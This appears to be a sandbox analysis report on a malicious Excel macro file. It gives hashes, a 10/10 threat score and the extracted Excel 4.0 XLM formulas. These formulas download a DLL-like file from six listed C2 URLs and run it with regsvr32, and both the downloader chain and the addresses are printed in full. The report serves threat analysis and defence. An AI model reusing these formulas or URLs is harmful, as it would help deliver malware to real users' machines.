Overview

overview

10

Static

static

10

da626549f7...2.xlsm

windows7-x64

10

da626549f7...2.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    da626549f7d06e4d44a3463bbf52b016b9d0be8513beda521f9fb94ed1852562

  • Size

    40KB

  • MD5

    f711f2f8094788cc92d5774492136ea2

  • SHA1

    471c1782f8942849131630e91ea0116c70a2f35c

  • SHA256

    da626549f7d06e4d44a3463bbf52b016b9d0be8513beda521f9fb94ed1852562

  • SHA512

    d1ecf8bd2ff6bda8fae070581e8712466685fedb0a8c4cafd786d47e6b4875f8936794c87fdc9d5e9deaef7402c4da277484e2a059d68d008c66317b14e7beed

  • SSDEEP

    768:2bomCS/DOevZCwt7OyKfcrND59V+L9Rw4eWrXcTqZ0VfddDhw:+omd/DmylND59V4jwmXc2CVfdxi

Score
10/10
macroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://linkmys.com/stats/nnF/

https://livejagat.com/h/UDwLU4FTwf/

https://ticsnp.azurewebsites.net/anko-agust/treN2T/

https://paintingsouq.com/l93mxsk/Ich7kJF7n3Fu5v/

https://sanvicente.group/wp-content/dBsh5232WHIsiwyQAln/

https://novinex.net/wp-admin/p9FV5/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://linkmys.com/stats/nnF/","..\dxw.ocx",0,0) =IF('EFALGV'!D10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://livejagat.com/h/UDwLU4FTwf/","..\dxw.ocx",0,0)) =IF('EFALGV'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://ticsnp.azurewebsites.net/anko-agust/treN2T/","..\dxw.ocx",0,0)) =IF('EFALGV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://paintingsouq.com/l93mxsk/Ich7kJF7n3Fu5v/","..\dxw.ocx",0,0)) =IF('EFALGV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://sanvicente.group/wp-content/dBsh5232WHIsiwyQAln/","..\dxw.ocx",0,0)) =IF('EFALGV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://novinex.net/wp-admin/p9FV5/","..\dxw.ocx",0,0)) =IF('EFALGV'!D20<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\dxw.ocx") =RETURN()

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

    macroxlm

Files

  • da626549f7d06e4d44a3463bbf52b016b9d0be8513beda521f9fb94ed1852562
    .xlsm office2007

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.